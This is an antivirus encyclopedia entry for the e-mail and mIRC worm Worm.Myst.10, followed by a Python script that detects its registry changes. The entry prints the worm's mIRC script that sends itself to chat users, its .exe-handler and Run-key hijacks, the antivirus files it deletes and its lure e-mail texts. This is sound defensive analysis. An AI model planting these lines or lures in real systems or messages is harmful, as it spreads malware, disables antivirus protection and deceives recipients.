Basic information
- Chinese name: 我的最愛 ("My Favorites")
- Foreign name: Worm.Myst.10
- Virus type: Worm
- Affected systems: Win9x / WinNT
Worm.Myst.10
Aliases: Email-Worm.Win32.generic[AVP], I-Worm/Myst.10[KV], Worm.Myst[RS]
Handling time:
Threat level: ★★
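Virus behavior:
This is a worm written in VB that spreads through e-mail and the mIRC chat system. It changes the .exe file association to point to itself, so that the virus is executed every time an .exe file is run. It deletes certain data belonging to three antivirus products so that they can no longer run properly. Besides collecting e-mail addresses from the Outlook address book and sending itself out as an attachment, it also writes script lines into the mIRC script configuration file so that it can spread through the mIRC chat system.
1) The virus copies itself to: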
C:\windows\system\systray_.exe
C:\windows\system\runtray_.dll
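2) Drops a temporary file C:\ModReg.reg and writes it into the registry with the command regedit /s C:\ModReg.reg
It changes the .exe file association to point to the virus, so that the virus is executed every time an .exe file is run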
HKEY_CLASSES_ROOT\exefile\shell\open\command
(Default)=""C:\windows\system\systray_.exe" %1 %*"
HKEY_LOCAL_MACHINE\Software\McAfee\Scan95
"SerialNum"="MYST v1.0 by MYSTiQUE"
"CurrentVersionNumber"="666"
"DAT"="NONE"
"DATFile"="-2000"
"VirusInfoURL"="http://ma***.sexchat.***"
"bVShieldEnabled"=0x0
Adds a startup entry for the virus:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"SystemTray"="C:\Windows\system\systray_.exe"
3) Writes the following content into the mIRC script configuration file C:\mirc\script.ini, so that the virus can spread through the mIRC chat system
[script]
n0= on 1:TEXT:*sex*:#:{
n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy.So I'm going to send you one.
n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe
n3= .dcc send $nick C:\windows\system\install_show.exe
n4= }
4) Deletes the following files belonging to three antivirus products:
C:\Program Files\Norton AntiVirus\*.dat
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\*.*
C:\Program Files\Common Files\KAV Shared Files\*.*
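5) Collects e-mail addresses from Outlook and sends the virus as an attachment to those recipients
One of the following lines is used as the e-mail subject: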
Here is the e-mail attachment I told you about earlier, It's an installation program for an adult screensaver slideshow program
Here is the e-mail attachment I told you about earlier, It's an installation program for an Outlook Service Release upgrade
Here is the e-mail attachment I told you about earlier, It's an installation program for a Microsoft Explorer Patch
Here is the e-mail attachment I told you about earlier, It's an installation program for a Desktop Game I got off the internet
Here is the e-mail attachment I told you about earlier, It's an installation program for a brand-new MP3 player and plug-ins
Here is the e-mail attachment I told you about earlier, It's an installation program for an Microsoft Internet Explorer Service Pack (Q401243)
Here is the e-mail attachment I told you about earlier, It's an installation program for an Kaspersky Anti-Virus 4.0 bugfix
E-mail body:
Hey, sorry I haven't written to you in a while. Well you could call it a while. I'm writing this E-mail to let you know of an attachment im sending with the next mail.
Here it is
E-mail attachment: C:\windows\install_.exe
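A defender-side check for the registry changes listed in step 2, as an added example that is not part of the original write-up: it parses a REGEDIT4-style registry export and flags the .exe handler hijack, the Run entry and the McAfee Scan95 tampering. The sample export, the indicator labels and the function names are constructed for illustration; the keys, values and file names are the ones listed above.

```python
import re

# Keys and file names below come from the write-up; keys are upper-cased for matching.
EXE_KEY = r"HKEY_CLASSES_ROOT\exefile\shell\open\command".upper()
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run".upper()
SCAN95_KEY = r"HKEY_LOCAL_MACHINE\Software\McAfee\Scan95".upper()
BENIGN_EXE_HANDLER = '"%1" %*'  # stock Windows handler for .exe files
WORM_FILES = ("systray_.exe", "runtray_.dll", "install_show.exe", "install_.exe")

# Constructed sample export (not captured from a real host).
SAMPLE = r'''REGEDIT4

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\windows\\system\\systray_.exe\" %1 %*"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="C:\\Windows\\system\\systray_.exe"
"Constructed"="C:\\Program Files\\Example\\app.exe"

[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]
"SerialNum"="MYST v1.0 by MYSTiQUE"
"bVShieldEnabled"=dword:00000000
'''

def parse_reg(text):
    """Parse a REGEDIT4-style export into {KEY_PATH: {value_name: data}}."""
    keys, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].upper(), {})
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            if data.startswith('"') and data.endswith('"'):
                data = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \\ and \" escapes
            current[name.strip('"')] = data
    return keys

def findings(text):
    """Return (indicator, detail) tuples for the registry changes described above."""
    keys, out = parse_reg(text), []
    handler = keys.get(EXE_KEY, {}).get("@")
    if handler is not None and handler != BENIGN_EXE_HANDLER:
        out.append(("exefile-hijack", handler))
    for name, data in keys.get(RUN_KEY, {}).items():
        if data.lower().endswith(WORM_FILES):
            out.append(("run-key", name))
    scan = keys.get(SCAN95_KEY, {})
    if "MYST" in scan.get("SerialNum", "") or scan.get("bVShieldEnabled") == "dword:00000000":
        out.append(("mcafee-tamper", scan.get("SerialNum", "")))
    return out
```

Because the hijacked handler runs the worm before any .exe, restoring the `exefile` default to `"%1" %*` belongs in cleanup alongside removing the Run entry.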